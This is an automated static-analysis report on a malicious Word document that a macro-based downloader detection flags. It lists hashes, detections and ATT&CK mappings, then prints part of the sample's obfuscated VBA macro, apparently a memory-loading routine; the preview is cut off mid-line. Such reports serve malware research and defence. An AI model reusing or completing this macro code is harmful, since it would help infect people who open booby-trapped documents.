Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 7815721d62ea9bb8…

MALICIOUS

Office (OLE)

Size: 178.5 KB
Created: 2018-05-08 19:00:00
Authoring application: Microsoft Office Word
First seen: 2019-05-16
MD5: 4610d2cf9edcc9074971624c354774e1
SHA-1: 12318a5701828dc35903dc1b12a92dc12214aa82
SHA-256: 7815721d62ea9bb86f4c347bc660a00437f64c8c04c658469d19994ea722b2d0
Risk score: 122

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The file is identified as malicious by ClamAV with the signature Doc.Downloader.Macro-6539595-0, indicating a macro-based downloader. The presence of VBA macros, including a Document_Open macro that runs automatically when the document is opened, further supports this classification. The VBA script likely attempts to download and execute a secondary payload, a common tactic for initial compromise via spearphishing attachments.

Heuristics (4)

  • ClamAV: Doc.Downloader.Macro-6539595-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Macro-6539595-0
  • VBA macros detected [medium, 1 related finding] OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro [high] OLE_VBA_DOCOPEN
    Document_Open macro (auto-executes when the document is opened)
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All URLs below are XMP/RDF schema namespace identifiers of the kind carried in embedded image metadata, not download locations.
    • http://ns.adobe.com/xap/1.0/  [In document text (OLE body)]
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#  [In document text (OLE body)]
    • http://ns.adobe.com/photoshop/1.0/  [In document text (OLE body)]
    • http://purl.org/dc/elements/1.1/  [In document text (OLE body)]
    • http://ns.adobe.com/xap/1.0/mm/  [In document text (OLE body)]
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent#  [In document text (OLE body)]
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef#  [In document text (OLE body)]

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 13272 bytes
SHA-256: 8ec5b03ab58c676cead9ae88197053906dfdbfa3e9515d5bc3a5bce288705a81

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub landholding()
Dim campagna As Integer
Dim loaves As Variant
carver.hydrocharis.Value = Day(#12/5/2013#)
varday = locality = charophyceae
spare = blackandwhite
cadastral = "cabdriver"
newspaper = "delaware"
cobia = "genetically"

endured = "gyroscopic"
asura = "originate"
finglefangle = "exclaim"
Set distensible = carver.hydrocharis.SelectedItem
kolkhoz = 3 + 14
 Pmt 0, kolkhoz, 9088, 20588, 7

stockpile = distensible.Name
migrate = 99 - 48 + 7793
resident = Right(stockpile, migrate)
guardhouse = elevated.codified(resident)
gang = 10 + 2
 Pmt 0, gang, 37373, 31590, 4

deletory = musophagidae
#If (62 - 111 + 449 + 12 - 44 + 332) > ((108 - 99 + 311) - (21 - 96 + 615) * 1) And ((23 - 27 + 32) - (80 - 107 + 55)) * 2 < (Win64) Then
Dim devil As Integer
Dim malacia As LongPtr
Dim bobsleigh As LongPtr
Dim methodism As Variant
#ElseIf (114 - 22 + 308 + 118 - 99 + 281) > ((117 - 121 + 324) - (2 - 40 + 578) * 1) And Not ((21 - 63 + 70) - (127 - 32 - 67)) * 2 < (Win64) Then
Dim musketeer As Integer
Dim bobsleigh As Long
Dim steelplate As Long
Dim malacia As Long
#End If
purgative = 86 - 45 - 41
seautongr = unmask
snappy = "manta"
molecular = 16 - 89 + 4169
stores = 20 + 1
 Pmt 0, stores, 33072, 54190, 5

doodia = outrageously
ordinand = "blossoms"
dove = 58 + 29
 Pmt 0, dove, 31866, 46095, 5

alone = guardhouse
emendation = "contrasty"
bowery = "boise"
malacia = euterpe(alone)
miami = eviscerate
#If (6 - 2 + 396 + 113 - 59 + 246) > ((93 - 38 + 265) - (40 - 107 + 607) * 1) And ((83 - 102 + 47) - (93 - 96 + 31)) * 2 < (Win64) Then
Dim residuum As Byte
Dim america As LongPtr
Dim satanophobia As LongPtr
Dim bury As LongPtr
aircooled = 15 - 4 + 2053
#ElseIf (58 - 88 + 430 + 107 - 24 + 217) > ((75 - 61 + 306) - (46 - 17 + 511) * 1) And Not ((42 - 17 + 3) - (103 - 68 - 7)) * 2 < (Win64) Then
Dim america As Long
misdo = 41 - 50 + 790
Dim satanophobia As Long
Dim bury As Long
aircooled = misdo + 3459

#End If
Dim tapir As String
Dim hypophysectomized As Byte
america = 83 - 2 - 81
bobsleigh = malacia + aircooled
satanophobia = 95 - 72 + 201504
bury = 97 - 119 + 3522
draggletailed = margaret(satanophobia, america, bobsleigh, america, america, america, america)
stodge = 1 + 43
 Pmt 0, stodge, 38284, 21989, 4

End Sub

Function acanthocytosis(pen, suavely, tenpenny)
Dim flickknife As Long
Dim alexipharmic As String
Dim minutia As Long
Dim bodacious As Long
Dim veriest As Long
Dim dulciana As Variant
Dim baronduki As Long
Dim dyadic As Long
Dim sunray As Long
Dim expectations As Long
Dim tobbaconist As Integer
cantankerously = cantankerously
cantankerously = nucifraga
flickknife = pen
sunray = tenpenny
cantankerously = nucifraga
veriest = suavely
gastromancy = 30 + 23
 Pmt 0, gastromancy, 26750, 33607, 4

combined = combined / 141
minutia = 58 - 105 + 46
octant ByVal minutia, flickknife, veriest, sunray, baronduki
cantankerously = "audiogram"
End Function
Function onethousandth(lamplit, caw, dimidiation)
Dim phantasmagoria As Integer
Dim pectoral As Byte
Dim demiglace As LongPtr
Dim misery As LongPtr
Dim chatham As LongPtr
Dim mothernaked As String
Dim amaze As LongPtr
Dim beggarweed As LongPtr
combined = Fix(69)
combined = Math.Round(479)
misery = lamplit
beggarweed = dimidiation
combined = Math.Round(397)
amaze = caw
thuringia = 13 + 42
 Pmt 0, thuringia, 2281, 12908, 5

combined = baited Or 488
demiglace = 77 - 19 - 59
octant ByVal demiglace, _
misery, _
amaze, beggarweed, _
chatham
nucifraga = "disembroil"
End Function
Function euterpe(anabolic)
Dim boundaries As Variant
Dim accord As Variant
Dim nagi As Integer
Dim creatine As String
#If (20 - 43 + 423 + 15 - 43 + 328) > ((13 - 21 + 328) - (12 - 50 + 578) * 1) And ((65 - 74 
... (truncated)